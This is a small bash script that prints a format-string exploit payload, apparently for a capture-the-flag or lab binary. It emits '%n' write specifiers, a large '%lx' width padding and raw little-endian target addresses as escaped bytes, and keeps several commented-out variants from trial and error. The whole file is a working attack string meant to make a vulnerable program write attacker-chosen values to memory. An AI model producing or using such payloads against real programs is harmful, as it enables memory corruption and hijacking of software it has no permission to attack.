#!/bin/bash
FORMAT_X_TIMES=7
FORMAT_S_TIMES=6
python -c "import sys; sys.stdout.write(\"%.0s\" * $FORMAT_X_TIMES)"
number=4196972
echo -n "%n"
echo -n "%"$number"lx"


#echo -n "%n"
#echo -n "%n"
echo -n "%n"
#echo -n "%47920%"
#echo -n "%n"
#echo -n "=%n="
echo -n 'salut'

#python -c "import sys; sys.stdout.write(\"%08lx\" * $FORMAT_S_TIMES)"
echo ''

#echo -e '\xe6\x11\x60\x00\x00\x00\x00\x00'
#echo -e '\xe4\x11\x60\x00\x00\x00\x00\x00'
#echo 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'
echo -en '\xe4\x11\x60\x00\x00\x00\x00\x00'
echo -en '\xe4\x11\x60\x00\x00\x00\x00\x00'
echo -en '\xe0\x11\x60\x00\x00\x00\x00\x00'
echo  'bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb'
